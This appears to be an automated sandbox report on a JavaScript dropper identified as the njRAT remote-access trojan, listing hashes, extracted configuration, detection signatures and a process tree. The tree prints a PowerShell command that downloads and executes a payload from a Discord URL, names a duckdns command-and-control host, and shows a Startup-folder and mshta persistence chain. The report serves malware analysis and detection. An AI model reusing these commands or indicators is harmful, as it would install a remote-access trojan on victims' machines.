Overview

overview

10

Static

static

34ce23e0ca...436.js

windows7_x64

10

34ce23e0ca...436.js

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    01-12-2021 18:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    34ce23e0cac1eb85e253f52b87c53436.js

  • Size

    256B

  • MD5

    34ce23e0cac1eb85e253f52b87c53436

  • SHA1

    fbc026960fc1009eae89f7506276a5e153ec58ec

  • SHA256

    ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104

  • SHA512

    488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d

Score
10/10
njratnyan catsuricatatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

yuni2022.duckdns.org:2000

Mutex

4ab2234479534

Attributes
  • reg_key

    4ab2234479534

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3224
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1440
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                  PID:656
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4412

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ea6243fdb2bfcca2211884b0a21a0afc

      SHA1

      2eee5232ca6acc33c3e7de03900e890f4adf0f2f

      SHA256

      5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

      SHA512

      189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      b0dff08d20a1b4c8f5fbd58c8bf158a3

      SHA1

      09a1030a8259c70482a34ebced772da16d05221a

      SHA256

      0d7b73bb449f0dace7ae1ccd4d492eaa4fac7c79cb339650688f5c865a555e56

      SHA512

      f67c75a8e560c1804e91bb5fdca3d85afe6b77a9ea6ca365ddabaa80dce52448cf458f3efe2d465fbb3172b6d0f42e75515789cb8e572f067bf0e43f538c5487

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
      MD5

      558a8b7b3fdef4ca79110f8cfd126694

      SHA1

      d6e96ca27f701b3f4c24885dacd14c762a9d36b0

      SHA256

      38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

      SHA512

      37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

      Download Submit
    • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
      MD5

      7f85382953fde20b101039d48673dbd2

      SHA1

      5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

      SHA256

      fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

      SHA512

      6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

      Download Submit
    • C:\Users\Public\myScript.ps1
      MD5

      b7ce758a456d759c9c8d9d165de473bc

      SHA1

      eb07b9f9a21b12945cd461d970b925698183b8f5

      SHA256

      0d44b8e8222a09eecef416a78409757ac190eae8bd7c0ceb2880791eedeec295

      SHA512

      8c239aa579b8e3875a271a730755c8ee2f83ac72b248270090a8bc025850ac2bd81100dac6118935a10ab686f7e295d599ee99a94779446db5b9cc30110cea04

      Download Submit
    • memory/904-156-0x0000000000000000-mapping.dmp
      Download
    • memory/1112-158-0x0000024B85468000-0x0000024B85470000-memory.dmp
      Filesize

      32KB

      Download
    • memory/1112-157-0x0000000000000000-mapping.dmp
      Download
    • memory/1440-179-0x00000158A2850000-0x00000158A2852000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-181-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-196-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-195-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-191-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-190-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-189-0x00000158A2870000-0x00000158A2873000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1440-186-0x00000158A28D3000-0x00000158A28D5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-188-0x00000158A28D6000-0x00000158A28D8000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-187-0x00000158A2860000-0x00000158A2865000-memory.dmp
      Filesize

      20KB

      Download
    • memory/1440-185-0x00000158A28D0000-0x00000158A28D2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-169-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-180-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-178-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-159-0x0000000000000000-mapping.dmp
      Download
    • memory/1440-161-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-174-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-162-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-163-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-164-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-165-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-170-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1440-168-0x000001588A190000-0x000001588A192000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-124-0x0000021FA7093000-0x0000021FA7095000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-126-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-119-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-121-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-122-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-118-0x0000000000000000-mapping.dmp
      Download
    • memory/1624-123-0x0000021FA7090000-0x0000021FA7092000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-127-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-125-0x0000021FBF740000-0x0000021FBF741000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1624-120-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-153-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-128-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-135-0x0000021FBF950000-0x0000021FBF952000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-134-0x0000021FA7096000-0x0000021FA7098000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-130-0x0000021FA6FC0000-0x0000021FA6FC2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-129-0x0000021FBF9D0000-0x0000021FBF9D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3224-152-0x0000000000000000-mapping.dmp
      Download
    • memory/4412-193-0x0000000000400000-0x000000000040C000-memory.dmp
      Filesize

      48KB

      Download
    • memory/4412-194-0x000000000040676E-mapping.dmp
      Download
    • memory/4412-202-0x0000000005340000-0x000000000583E000-memory.dmp
      Filesize

      5.0MB

      Download